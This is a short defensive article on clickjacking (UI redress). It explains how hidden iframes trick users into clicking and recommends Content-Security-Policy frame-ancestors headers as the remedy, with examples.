Clickjacking

Description

Clickjacking, also sometime called UI Redress Attack, is when an attacker is able to make an iframe transparent and by doing so tricking the user to click on a button or link that cannot be seen. The user thinks they click on the page they’re on, but the click actually goes to the hidden iframe in the background, and the user is thereby tricked into executing unwanted actions.

What can happen?

The potential impact of clickjacking is all about what kind of action an attacker can trick the victim into. It is often something fairly innocent, such as gathering Facebook likes, but could potentially range to something like spying with a web camera or transferring money from a bank account.

Example of Clickjacking

A code example of a vulnerable page is of no use as all web pages are vulnerable by default. All pages require protection to be implemented in order not to be vulnerable to clickjacking.

Clickjacking does not only affect websites, but also plugins. One of the most known examples was the ability to clickjack the settings page for Adobe Flash plugin. By loading that page into an invisible iframe an attacker could trick the user into giving up access to their web camera, enabling the attacker to spy on the victim.

Remediation

What you want to do is prevent the attacker from being able to iframe the page. That can be done in multiple ways, but we would recommend the use of frame-ancestors. It is also possible to use X-Frame-Options, which will not be covered here.

To fully disable iframes, a policy as below should be implemented:
Content-Security-Policy: frame-ancestors 'none'

To only allow iframes within the same site, use the following:
Content-Security-Policy: frame-ancestors 'self'

And lastly, to explicitly allow certain domains to iframe the page but disallowing the rest:
Content-Security-Policy: frame-ancestors trusted.com

Please read about CSP in general before trying to implement any of those.

In cases where the ability to iframe the page is needed, a windows.confirm-box can be used as  an alternative protection. It might not look that modern, but if the user is required to accept the action in such way it cannot be bypassed.

Insufficient remediation methods

There are also a lot of JavaScripts out there made with the intention to protect against Clickjacking. However, many of those do not work or can be bypassed, and we would therefore recommend staying away from those.

As all browsers today support the proper remediation explained above we see no reason to still use the JavaScript-based ones.

Resources

OWASP: Clickjacking Defense Cheat Sheet